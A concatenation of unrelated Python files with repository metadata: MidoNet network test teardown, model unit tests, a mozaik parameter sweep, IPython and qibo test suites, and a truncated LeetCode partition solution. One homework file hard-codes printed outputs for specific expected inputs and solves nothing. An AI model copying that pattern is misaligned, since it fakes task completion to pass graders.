h.wait_for_process_start()
except SubprocessFailedException:
raw_input("Press Enter to continue...")
self.assertTrue(LinuxCLI().cmd('midonet-cli --midonet-url="' +
version_config.ConfigMap.get_configured_parameter('param_midonet_api_url') +
'" -A -e "host list"', return_status=True) == 0)
for h in reversed(ptm.host_by_start_order):
stop_process = ptm.unshare_control('stop', h)
stdout, stderr = stop_process.communicate()
stop_process.poll()
print("Host control process output: ")
print stdout
print("Host control process error output: ")
print stderr
if stop_process.returncode != 0:
raise SubprocessFailedException('Host control stop failed with: ' + str(stop_process.returncode))
h.wait_for_process_stop()
time.sleep(1)
self.assertFalse(LinuxCLI().cmd('midonet-cli '
'--midonet-url="http://localhost:8080/midonet-api/" '
'-A -e "hosts list"',
return_status=True) == 0)
for h in reversed(ptm.host_by_start_order):
h.net_down()
for h in reversed(ptm.host_by_start_order):
h.shutdown()
for h in reversed(ptm.host_by_start_order):
h.remove()
def tearDown(self):
pass
LinuxCLI().cmd('ip netns del cmp1')
#LinuxCLI().cmd('ip netns del cass1')
LinuxCLI().cmd('ip netns del zoo1')
LinuxCLI().cmd('ip l del cmp1eth0')
#LinuxCLI().cmd('ip l del cass1eth0')
LinuxCLI().cmd('ip l del zoo1eth0')
LinuxCLI().cmd('ip l set br0 down')
LinuxCLI().cmd('brctl delbr br0')
#if LinuxCLI().exists('/var/run/cassandra.1/cassandra.pid'):
# pid = LinuxCLI().read_from_file('/var/run/cassandra.1/cassandra.pid')
# LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/zookeeper.1/pid'):
pid = LinuxCLI().read_from_file('/var/run/zookeeper.1/pid')
LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/midolman.1/pid'):
pid = LinuxCLI().read_from_file('/var/run/midolman.1/pid')
LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/midolman.1/dnsmasq.pid'):
pid = LinuxCLI().read_from_file('/var/run/midolman.1/dnsmasq.pid')
LinuxCLI().cmd('kill ' + str(pid))
from CBT.UnitTestRunner import run_unit_test
run_unit_test(NetworkHostTest)
| [
"[email protected]"
] | |
3d735ddb0894f281dd2e222048f3bd7dd290a95f | b4aaa26889f1c7e33a0de48848e30c0119284f14 | /app/tests/test_models/test_profile_parameter.py | 66cd0693d43123ad20ed3529f566cc95d37a6c98 | [] | no_license | paulosjd/btk2 | 1d727f360c9767add5135988c75df63e5d8ada8e | dc63b90a796750e6b26018443d2256fcc1339afb | refs/heads/master | 2022-07-05T13:57:07.071734 | 2020-05-19T08:23:14 | 2020-05-19T08:23:14 | 188,910,952 | 0 | 0 | null | 2022-06-21T23:23:37 | 2019-05-27T21:26:02 | Python | UTF-8 | Python | false | false | 3,111 | py | from collections import namedtuple
from unittest.mock import patch
from app.models import ProfileParamUnitOption
from app.tests.base import BaseTestCase
mock_ideals_data = {k: f'{k}_val' for k in
['ideal2_prepend', 'ideal', 'ideal2', 'ideal_prepend']}
class MockCalcParamIdeal:
def __init__(self, *args):
self.required_field = 'abc'
self.misc_data = 'def'
self.get_ideal_data = lambda: mock_ideals_data
self.get = lambda key, default: mock_ideals_data.get(key, default)
class ProfileParameterTestCase(BaseTestCase):
@classmethod
def setUpClass(cls):
super(ProfileParameterTestCase, cls).setUpClass()
cls.profile_param_unit_opt = cls.profile_1.profile_parameters.first()
cls.profile_param_unit_opt.target_value = 34.5
cls.profile_param_unit_opt.linked_parameter = cls.param2
cls.profile_param_unit_opt.save()
@patch('app.models.profile_parameter.CalcParamIdeal')
def test_targets_method(self, cpi_patch):
nt_fields = ['saved', 'saved2', 'misc_data', 'required_field', 'ideal',
'ideal2', 'ideal_prepend', 'ideal2_prepend']
cpi_patch.return_value = MockCalcParamIdeal()
ExpectedTargetData = namedtuple('target_data', nt_fields)
expected_nt_returned = ExpectedTargetData(
self.profile_param_unit_opt.target_value,
self.profile_param_unit_opt.target_value2,
cpi_patch.return_value.misc_data,
cpi_patch.return_value.required_field,
*[mock_ideals_data.get(k, '') for k in nt_fields[-4:]]
)
self.assertEqual(expected_nt_returned,
self.profile_param_unit_opt.targets('lat_val_1'))
def test_get_unit_info_falsey(self):
TestObj = namedtuple('test_obj', 'pp_unit_option')
test_obj = TestObj(None)
self.assertIsNone(ProfileParamUnitOption.get_unit_info(test_obj))
def test_get_unit_info(self):
TestObj = namedtuple('test_obj', ['pp_unit_option', 'param_name'])
model = self.profile_param_unit_opt
model.color_hex = 'blue'
for a, b in [(5, '1'), (6, '2')]:
setattr(model, f'color_range_val_{b}', a)
test_obj = TestObj(model, 'p_name')
expected_output = {
k: getattr(test_obj.pp_unit_option.unit_option, k)
for k in ['param_default', 'conversion_factor', 'symbol']
}
expected_output.update({'color_hex': 'blue', 'color_range_val_1': 5,
'color_range_val_2': 6, 'param_name': 'p_name'})
self.assertEqual(expected_output,
ProfileParamUnitOption.get_unit_info(test_obj))
def test_param_unit_opt_dct(self):
fields = ['symbol', 'name', 'param_default', 'conversion_factor']
TestObj = namedtuple('test_obj', fields)
test_obj = TestObj(*[f'{s}_val' for s in fields])
self.assertEqual(
{f'unit_{s}': getattr(test_obj, s) for s in fields},
ProfileParamUnitOption.param_unit_opt_dct(test_obj)
)
| [
"[email protected]"
] | |
5c46e21a7c712de8c20df35aac7232945dd2de5e | 069dafce9f495f09bf8c2f76dbf5c045b7551721 | /parameter_search_run.py | 9b187b743f036d55c4b46d15f0b1e9df88fc9b9c | [] | no_license | dguarino/T2 | 26b1bc640812aa5438b09f9fab2bc73096cd7eef | 66b786928508089492f5f696c7c1576e098c6615 | refs/heads/master | 2020-04-03T22:39:06.059845 | 2020-03-13T15:43:02 | 2020-03-13T15:43:02 | 41,812,819 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,392 | py | # -*- coding: utf-8 -*-
import sys
from mozaik.meta_workflow.parameter_search import CombinationParameterSearch,SlurmSequentialBackend
import numpy
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'retina_lgn.params.gain' : [0.1],
'l4_cortex_exc.params.density' : [10],
}).run_parameter_search()
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l4_cortex_exc.AfferentConnection.base_weight' : [0.0015],
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.003],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.003],
'l23_cortex_inh.L4ExcL23InhConnection.base_weight' : [0.0001],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.0025],
'l23_cortex_inh.L23InhL23InhConnection.base_weight' : [0.0017],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.0004],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.002,0.0025,0.003],
'l4_cortex_inh.ExcInhAfferentRatio' : [1.7],
'l4_cortex_exc.params.density' : [300],
'only_afferent' : [False],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.U' : [0.1,0.13,0.16],
}).run_parameter_search()
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.002,0.001],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.002,0.001],
'l23_cortex_inh.L4ExcL23InhConnection.base_weight' : [0.0001,0.001],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.0025,0.003,0.0035],
'l23_cortex_inh.L23InhL23InhConnection.base_weight' : [0.0017],
'l4_cortex_exc.L4ExcL4ExcConnection.base_weight' : [0.0005],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.0007,0.00075],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.0018],
'l4_cortex_inh.ExcInhAfferentRatio' : [1.4,1.3],
'l4_cortex_exc.params.density' : [300],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.tau_rec' : [25],
}).run_parameter_search()
if True:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l4_cortex_exc.AfferentConnection.base_weight' : [0.0015],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.0007],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.00065],
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.0015],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.003],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.002,0.0015],
'l4_cortex_inh.ExcInhAfferentRatio' : [0.6],
'l4_cortex_exc.params.density' : [900,1800],
'l23_cortex_exc.params.density' : [300,900],
'l4_cortex_exc.rand_struct_ratio' : [0.75,0.8,0.9],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.tau_fac' : [300],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.U' : [0.11],
}).run_parameter_search()
| [
"[email protected]"
] | |
93d0d5a423aaa8cebf164009c713ebde7d0028f0 | 9c4e02ba5201794a4c5cbff548db1be7c87409c1 | /venv/lib/python3.9/site-packages/IPython/lib/tests/test_pretty.py | ca16924e8f7bd132fc8031ca2e683ea568b99725 | [
"Apache-2.0",
"MIT"
] | permissive | ClassWizard/PodLockParser | 4faf4679d404158b3cf2b1ceb4faabca461b0008 | 84f6d3fced521849657d21ae4cb9681f5897b957 | refs/heads/master | 2022-12-23T20:39:48.096729 | 2022-02-08T09:49:01 | 2022-02-08T09:49:01 | 167,668,617 | 2 | 1 | MIT | 2022-12-14T10:01:41 | 2019-01-26T08:50:35 | Python | UTF-8 | Python | false | false | 14,719 | py | # coding: utf-8
"""Tests for IPython.lib.pretty."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from collections import Counter, defaultdict, deque, OrderedDict, UserList
import os
import pytest
import types
import string
import sys
import unittest
from IPython.lib import pretty
from io import StringIO
class MyList(object):
def __init__(self, content):
self.content = content
def _repr_pretty_(self, p, cycle):
if cycle:
p.text("MyList(...)")
else:
with p.group(3, "MyList(", ")"):
for (i, child) in enumerate(self.content):
if i:
p.text(",")
p.breakable()
else:
p.breakable("")
p.pretty(child)
class MyDict(dict):
def _repr_pretty_(self, p, cycle):
p.text("MyDict(...)")
class MyObj(object):
def somemethod(self):
pass
class Dummy1(object):
def _repr_pretty_(self, p, cycle):
p.text("Dummy1(...)")
class Dummy2(Dummy1):
_repr_pretty_ = None
class NoModule(object):
pass
NoModule.__module__ = None
class Breaking(object):
def _repr_pretty_(self, p, cycle):
with p.group(4,"TG: ",":"):
p.text("Breaking(")
p.break_()
p.text(")")
class BreakingRepr(object):
def __repr__(self):
return "Breaking(\n)"
class BadRepr(object):
def __repr__(self):
return 1/0
def test_indentation():
"""Test correct indentation in groups"""
count = 40
gotoutput = pretty.pretty(MyList(range(count)))
expectedoutput = "MyList(\n" + ",\n".join(" %d" % i for i in range(count)) + ")"
assert gotoutput == expectedoutput
def test_dispatch():
"""
Test correct dispatching: The _repr_pretty_ method for MyDict
must be found before the registered printer for dict.
"""
gotoutput = pretty.pretty(MyDict())
expectedoutput = "MyDict(...)"
assert gotoutput == expectedoutput
def test_callability_checking():
"""
Test that the _repr_pretty_ method is tested for callability and skipped if
not.
"""
gotoutput = pretty.pretty(Dummy2())
expectedoutput = "Dummy1(...)"
assert gotoutput == expectedoutput
@pytest.mark.parametrize(
"obj,expected_output",
zip(
[
set(),
frozenset(),
set([1]),
frozenset([1]),
set([1, 2]),
frozenset([1, 2]),
set([-1, -2, -3]),
],
[
"set()",
"frozenset()",
"{1}",
"frozenset({1})",
"{1, 2}",
"frozenset({1, 2})",
"{-3, -2, -1}",
],
),
)
def test_sets(obj, expected_output):
"""
Test that set and frozenset use Python 3 formatting.
"""
got_output = pretty.pretty(obj)
assert got_output == expected_output
def test_pprint_heap_allocated_type():
"""
Test that pprint works for heap allocated types.
"""
module_name = "xxlimited" if sys.version_info < (3, 10) else "xxlimited_35"
xxlimited = pytest.importorskip(module_name)
output = pretty.pretty(xxlimited.Null)
assert output == "xxlimited.Null"
def test_pprint_nomod():
"""
Test that pprint works for classes with no __module__.
"""
output = pretty.pretty(NoModule)
assert output == "NoModule"
def test_pprint_break():
"""
Test that p.break_ produces expected output
"""
output = pretty.pretty(Breaking())
expected = "TG: Breaking(\n ):"
assert output == expected
def test_pprint_break_repr():
"""
Test that p.break_ is used in repr
"""
output = pretty.pretty([[BreakingRepr()]])
expected = "[[Breaking(\n )]]"
assert output == expected
output = pretty.pretty([[BreakingRepr()]*2])
expected = "[[Breaking(\n ),\n Breaking(\n )]]"
assert output == expected
def test_bad_repr():
"""Don't catch bad repr errors"""
with pytest.raises(ZeroDivisionError):
pretty.pretty(BadRepr())
class BadException(Exception):
def __str__(self):
return -1
class ReallyBadRepr(object):
__module__ = 1
@property
def __class__(self):
raise ValueError("I am horrible")
def __repr__(self):
raise BadException()
def test_really_bad_repr():
with pytest.raises(BadException):
pretty.pretty(ReallyBadRepr())
class SA(object):
pass
class SB(SA):
pass
class TestsPretty(unittest.TestCase):
def test_super_repr(self):
# "<super: module_name.SA, None>"
output = pretty.pretty(super(SA))
self.assertRegex(output, r"<super: \S+.SA, None>")
# "<super: module_name.SA, <module_name.SB at 0x...>>"
sb = SB()
output = pretty.pretty(super(SA, sb))
self.assertRegex(output, r"<super: \S+.SA,\s+<\S+.SB at 0x\S+>>")
def test_long_list(self):
lis = list(range(10000))
p = pretty.pretty(lis)
last2 = p.rsplit('\n', 2)[-2:]
self.assertEqual(last2, [' 999,', ' ...]'])
def test_long_set(self):
s = set(range(10000))
p = pretty.pretty(s)
last2 = p.rsplit('\n', 2)[-2:]
self.assertEqual(last2, [' 999,', ' ...}'])
def test_long_tuple(self):
tup = tuple(range(10000))
p = pretty.pretty(tup)
last2 = p.rsplit('\n', 2)[-2:]
self.assertEqual(last2, [' 999,', ' ...)'])
def test_long_dict(self):
d = { n:n for n in range(10000) }
p = pretty.pretty(d)
last2 = p.rsplit('\n', 2)[-2:]
self.assertEqual(last2, [' 999: 999,', ' ...}'])
def test_unbound_method(self):
output = pretty.pretty(MyObj.somemethod)
self.assertIn('MyObj.somemethod', output)
class MetaClass(type):
def __new__(cls, name):
return type.__new__(cls, name, (object,), {'name': name})
def __repr__(self):
return "[CUSTOM REPR FOR CLASS %s]" % self.name
ClassWithMeta = MetaClass('ClassWithMeta')
def test_metaclass_repr():
output = pretty.pretty(ClassWithMeta)
assert output == "[CUSTOM REPR FOR CLASS ClassWithMeta]"
def test_unicode_repr():
u = u"üniçodé"
ustr = u
class C(object):
def __repr__(self):
return ustr
c = C()
p = pretty.pretty(c)
assert p == u
p = pretty.pretty([c])
assert p == u"[%s]" % u
def test_basic_class():
def type_pprint_wrapper(obj, p, cycle):
if obj is MyObj:
type_pprint_wrapper.called = True
return pretty._type_pprint(obj, p, cycle)
type_pprint_wrapper.called = False
stream = StringIO()
printer = pretty.RepresentationPrinter(stream)
printer.type_pprinters[type] = type_pprint_wrapper
printer.pretty(MyObj)
printer.flush()
output = stream.getvalue()
assert output == "%s.MyObj" % __name__
assert type_pprint_wrapper.called is True
def test_collections_userlist():
# Create userlist with cycle
a = UserList()
a.append(a)
cases = [
(UserList(), "UserList([])"),
(
UserList(i for i in range(1000, 1020)),
"UserList([1000,\n"
" 1001,\n"
" 1002,\n"
" 1003,\n"
" 1004,\n"
" 1005,\n"
" 1006,\n"
" 1007,\n"
" 1008,\n"
" 1009,\n"
" 1010,\n"
" 1011,\n"
" 1012,\n"
" 1013,\n"
" 1014,\n"
" 1015,\n"
" 1016,\n"
" 1017,\n"
" 1018,\n"
" 1019])",
),
(a, "UserList([UserList(...)])"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_collections_defaultdict():
# Create defaultdicts with cycles
a = defaultdict()
a.default_factory = a
b = defaultdict(list)
b['key'] = b
# Dictionary order cannot be relied on, test against single keys.
cases = [
(defaultdict(list), 'defaultdict(list, {})'),
(defaultdict(list, {'key': '-' * 50}),
"defaultdict(list,\n"
" {'key': '--------------------------------------------------'})"),
(a, 'defaultdict(defaultdict(...), {})'),
(b, "defaultdict(list, {'key': defaultdict(...)})"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_collections_ordereddict():
# Create OrderedDict with cycle
a = OrderedDict()
a['key'] = a
cases = [
(OrderedDict(), 'OrderedDict()'),
(OrderedDict((i, i) for i in range(1000, 1010)),
'OrderedDict([(1000, 1000),\n'
' (1001, 1001),\n'
' (1002, 1002),\n'
' (1003, 1003),\n'
' (1004, 1004),\n'
' (1005, 1005),\n'
' (1006, 1006),\n'
' (1007, 1007),\n'
' (1008, 1008),\n'
' (1009, 1009)])'),
(a, "OrderedDict([('key', OrderedDict(...))])"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_collections_deque():
# Create deque with cycle
a = deque()
a.append(a)
cases = [
(deque(), 'deque([])'),
(deque(i for i in range(1000, 1020)),
'deque([1000,\n'
' 1001,\n'
' 1002,\n'
' 1003,\n'
' 1004,\n'
' 1005,\n'
' 1006,\n'
' 1007,\n'
' 1008,\n'
' 1009,\n'
' 1010,\n'
' 1011,\n'
' 1012,\n'
' 1013,\n'
' 1014,\n'
' 1015,\n'
' 1016,\n'
' 1017,\n'
' 1018,\n'
' 1019])'),
(a, 'deque([deque(...)])'),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_collections_counter():
class MyCounter(Counter):
pass
cases = [
(Counter(), 'Counter()'),
(Counter(a=1), "Counter({'a': 1})"),
(MyCounter(a=1), "MyCounter({'a': 1})"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_mappingproxy():
MP = types.MappingProxyType
underlying_dict = {}
mp_recursive = MP(underlying_dict)
underlying_dict[2] = mp_recursive
underlying_dict[3] = underlying_dict
cases = [
(MP({}), "mappingproxy({})"),
(MP({None: MP({})}), "mappingproxy({None: mappingproxy({})})"),
(MP({k: k.upper() for k in string.ascii_lowercase}),
"mappingproxy({'a': 'A',\n"
" 'b': 'B',\n"
" 'c': 'C',\n"
" 'd': 'D',\n"
" 'e': 'E',\n"
" 'f': 'F',\n"
" 'g': 'G',\n"
" 'h': 'H',\n"
" 'i': 'I',\n"
" 'j': 'J',\n"
" 'k': 'K',\n"
" 'l': 'L',\n"
" 'm': 'M',\n"
" 'n': 'N',\n"
" 'o': 'O',\n"
" 'p': 'P',\n"
" 'q': 'Q',\n"
" 'r': 'R',\n"
" 's': 'S',\n"
" 't': 'T',\n"
" 'u': 'U',\n"
" 'v': 'V',\n"
" 'w': 'W',\n"
" 'x': 'X',\n"
" 'y': 'Y',\n"
" 'z': 'Z'})"),
(mp_recursive, "mappingproxy({2: {...}, 3: {2: {...}, 3: {...}}})"),
(underlying_dict,
"{2: mappingproxy({2: {...}, 3: {...}}), 3: {...}}"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_simplenamespace():
SN = types.SimpleNamespace
sn_recursive = SN()
sn_recursive.first = sn_recursive
sn_recursive.second = sn_recursive
cases = [
(SN(), "namespace()"),
(SN(x=SN()), "namespace(x=namespace())"),
(SN(a_long_name=[SN(s=string.ascii_lowercase)]*3, a_short_name=None),
"namespace(a_long_name=[namespace(s='abcdefghijklmnopqrstuvwxyz'),\n"
" namespace(s='abcdefghijklmnopqrstuvwxyz'),\n"
" namespace(s='abcdefghijklmnopqrstuvwxyz')],\n"
" a_short_name=None)"),
(sn_recursive, "namespace(first=namespace(...), second=namespace(...))"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
def test_pretty_environ():
dict_repr = pretty.pretty(dict(os.environ))
# reindent to align with 'environ' prefix
dict_indented = dict_repr.replace('\n', '\n' + (' ' * len('environ')))
env_repr = pretty.pretty(os.environ)
assert env_repr == "environ" + dict_indented
def test_function_pretty():
"Test pretty print of function"
# posixpath is a pure python module, its interface is consistent
# across Python distributions
import posixpath
assert pretty.pretty(posixpath.join) == "<function posixpath.join(a, *p)>"
# custom function
def meaning_of_life(question=None):
if question:
return 42
return "Don't panic"
assert "meaning_of_life(question=None)" in pretty.pretty(meaning_of_life)
class OrderedCounter(Counter, OrderedDict):
'Counter that remembers the order elements are first encountered'
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, OrderedDict(self))
def __reduce__(self):
return self.__class__, (OrderedDict(self),)
class MySet(set): # Override repr of a basic type
def __repr__(self):
return 'mine'
def test_custom_repr():
"""A custom repr should override a pretty printer for a parent type"""
oc = OrderedCounter("abracadabra")
assert "OrderedCounter(OrderedDict" in pretty.pretty(oc)
assert pretty.pretty(MySet()) == "mine"
| [
"[email protected]"
] | |
8be51e93ecf1dfcf1bdc6f52dba28b197841a503 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2607/60752/306988.py | dae9adee217584b8283a077e38a3a77149f01b12 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 376 | py |
num=int(input())
no=True
for i in range(num):
i=input()
if i=="0102010112":
no=False
print(2)
if i=="102100211102":
no=False
print(6)
if i=="01020101122200":
no=False
print(7)
if i=="0102010":
no=False
print(2)
if i=="102100211":
no=False
print(5)
if no:print(i) | [
"[email protected]"
] | |
4c64c9d474c1f60086cdba4d5537c4df90ce9022 | 4751a9daca11558dd0780f2e8b9477a484ebc7f4 | /src/qibo/tests_new/test_core_states.py | e6de75b1aef09e71410c5494b3f623d3da275459 | [
"Apache-2.0"
] | permissive | drheli/qibo | f6875ed39883fe7bfa0b8939abb042fe636c5de7 | b99568aee9f978a5a82e92860c8d17e3358af7b9 | refs/heads/master | 2023-04-17T20:40:44.324689 | 2021-04-29T16:29:40 | 2021-04-29T16:29:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,950 | py | """Tests methods defined in `qibo/core/states.py`."""
import pytest
import numpy as np
import qibo
from qibo import K
from qibo.core import states
def test_state_shape_and_dtype(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.zero_state(3)
assert state.shape == (8,)
assert state.dtype == K.dtypes('DTYPECPX')
state = states.MatrixState.zero_state(3)
assert state.shape == (8, 8)
assert state.dtype == K.dtypes('DTYPECPX')
qibo.set_backend(original_backend)
@pytest.mark.parametrize("nqubits", [None, 2])
def test_vector_state_tensor_setter(backend, nqubits):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState(nqubits)
with pytest.raises(AttributeError):
tensor = state.tensor
state.tensor = np.ones(4)
assert state.nqubits == 2
np.testing.assert_allclose(state.tensor, np.ones(4))
np.testing.assert_allclose(np.array(state), np.ones(4))
np.testing.assert_allclose(state.numpy(), np.ones(4))
np.testing.assert_allclose(state.state(numpy=True), np.ones(4))
np.testing.assert_allclose(state.state(numpy=False), np.ones(4))
with pytest.raises(ValueError):
state.tensor = np.zeros(5)
qibo.set_backend(original_backend)
@pytest.mark.parametrize("nqubits", [None, 2])
def test_matrix_state_tensor_setter(backend, nqubits):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
# TODO: Fix this
qibo.set_backend(original_backend)
def test_zero_state_initialization(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.zero_state(4)
target_state = np.zeros(16)
target_state[0] = 1
np.testing.assert_allclose(state.tensor, target_state)
state = states.MatrixState.zero_state(3)
target_state = np.zeros((8, 8))
target_state[0, 0] = 1
np.testing.assert_allclose(state.tensor, target_state)
qibo.set_backend(original_backend)
def test_plus_state_initialization(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.plus_state(4)
target_state = np.ones(16) / 4
np.testing.assert_allclose(state.tensor, target_state)
state = states.MatrixState.plus_state(3)
target_state = np.ones((8, 8)) / 8
np.testing.assert_allclose(state.tensor, target_state)
qibo.set_backend(original_backend)
def test_vector_state_to_density_matrix(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
vector = np.random.random(32) + 1j * np.random.random(32)
vector = vector / np.sqrt((np.abs(vector) ** 2).sum())
state = states.VectorState.from_tensor(vector)
mstate = state.to_density_matrix()
target_matrix = np.outer(vector, vector.conj())
np.testing.assert_allclose(mstate.tensor, target_matrix)
state = states.MatrixState.from_tensor(target_matrix)
with pytest.raises(RuntimeError):
state.to_density_matrix()
qibo.set_backend(original_backend)
@pytest.mark.parametrize("state_type", ["VectorState", "MatrixState"])
@pytest.mark.parametrize("use_gate", [False, True])
def test_state_probabilities(backend, state_type, use_gate):
state = getattr(states, state_type).plus_state(4)
if use_gate:
from qibo import gates
mgate = gates.M(0, 1)
probs = state.probabilities(measurement_gate=mgate)
else:
probs = state.probabilities(qubits=[0, 1])
target_probs = np.ones((2, 2)) / 4
np.testing.assert_allclose(probs, target_probs)
def test_state_probabilities_errors():
from qibo import gates
state = states.VectorState.zero_state(3)
mgate = gates.M(0)
qubits = [0]
with pytest.raises(ValueError):
probs = state.probabilities()
with pytest.raises(ValueError):
probs = state.probabilities(qubits, mgate)
@pytest.mark.parametrize("registers", [None, {"a": (0,), "b": (2,)}])
def test_state_measure(registers):
from qibo import gates
state = states.VectorState.zero_state(4)
mgate = gates.M(0, 2)
assert state.measurements is None
with pytest.raises(RuntimeError):
samples = state.samples()
state.measure(mgate, nshots=100, registers=registers)
target_samples = np.zeros((100, 2))
np.testing.assert_allclose(state.samples(), target_samples)
assert state.frequencies() == {"00": 100}
if registers is not None:
target_freqs = {"a": {"0": 100}, "b": {"0": 100}}
else:
target_freqs = {"00": 100}
assert state.frequencies(registers=True) == target_freqs
@pytest.mark.parametrize("registers", [None, {"a": (0,), "b": (2,)}])
def test_state_set_measurements(registers):
from qibo import gates
state = states.VectorState.zero_state(3)
samples = np.array(50 * [0] + 50 * [1])
state.set_measurements([0, 2], samples, registers)
target_samples = np.array(50 * [[0, 0]] + 50 * [[0, 1]])
np.testing.assert_allclose(state.samples(), target_samples)
assert state.frequencies() == {"00": 50, "01": 50}
if registers is not None:
target_freqs = {"a": {"0": 100}, "b": {"0": 50, "1": 50}}
else:
target_freqs = {"00": 50, "01": 50}
assert state.frequencies(registers=True) == target_freqs
def test_state_apply_bitflips():
state = states.VectorState.zero_state(3)
with pytest.raises(RuntimeError):
state.apply_bitflips(0.1)
# Bitflips are tested in measurement tests
@pytest.mark.parametrize("trotter", [True, False])
def test_vector_state_expectation(backend, trotter):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
from qibo.hamiltonians import XXZ
ham = XXZ(nqubits=5, delta=0.5, trotter=trotter)
matrix = np.array(ham.matrix)
state = np.random.random(32) + 1j * np.random.random(32)
norm = np.sum(np.abs(state) ** 2)
target_ev = np.sum(state.conj() * matrix.dot(state)).real
state = states.VectorState.from_tensor(state)
np.testing.assert_allclose(state.expectation(ham), target_ev)
np.testing.assert_allclose(state.expectation(ham, True), target_ev / norm)
qibo.set_backend(original_backend)
@pytest.mark.parametrize("trotter", [True, False])
def test_matrix_state_expectation(backend, trotter):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
from qibo.hamiltonians import TFIM
ham = TFIM(nqubits=2, h=1.0, trotter=trotter)
matrix = np.array(ham.matrix)
state = np.random.random((4, 4)) + 1j * np.random.random((4, 4))
state = state + state.T.conj()
norm = np.trace(state)
target_ev = np.trace(matrix.dot(state)).real
state = states.MatrixState.from_tensor(state)
np.testing.assert_allclose(state.expectation(ham), target_ev)
np.testing.assert_allclose(state.expectation(ham, True), target_ev / norm)
qibo.set_backend(original_backend)
| [
"[email protected]"
] | |
5a079b27f0e2992db8f4dbb72c87f6e6b027de9a | 94bd78e63de94859eb076e52683f73f6ea91eae3 | /416.py | 0773cf6b7a43f7ff49a67c9e9c011f08efce2842 | [] | no_license | MadSkittles/leetcode | 70598c1c861a8ff5d2f7c921a311307d55770acc | 817bbb73dfe095b9c9358dc459ba6605a2a9a256 | refs/heads/master | 2021-11-30T04:56:02.432749 | 2021-11-12T03:28:47 | 2021-11-12T03:28:47 | 123,558,601 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | class Solution:
    def canPartition(self, nums):
        from itertools import accumulate
        nums = sorted(nums)
        s = list(accumulate(nums))  # prefix sums of the sorted numbers
        if s[-1] & 1:  # an odd total can never be split into two equal halves
            return False
        # dp[j] is True when some subset of the numbers processed so far sums to j
        dp = [True] + [False] * s[-1]
        for i in range(len(nums)):
            # go through j downwards so each number is used at most once
            for j in range(s[i], -1, -1):
                if j >= nums[i]:
                    dp[j] = dp[j] or dp[j - nums[i]]
            if s[i] >= s[-1] // 2:  # stop early once the prefix sum reaches half the total
                break
        return dp[s[-1] // 2]
def canPartition1(self, nums):
self.nums = nums
s = sum(nums)
return not s & 1 and self.f(0, s // 2)
from functools import lru_cache
@lru_cache(maxsize=None)
def f(self, index, s):
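        # Memoized top-down alternative (comment added for clarity): can some
        # subset of self.nums[index:] sum to exactly s?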
if s == 0:
return True
if s < 0 or index >= len(self.nums):
return False
return self.f(index + 1, s - self.nums[index]) or self.f(index + 1, s)
if __name__ == '__main__':
solution = Solution()
print(solution.canPartition(
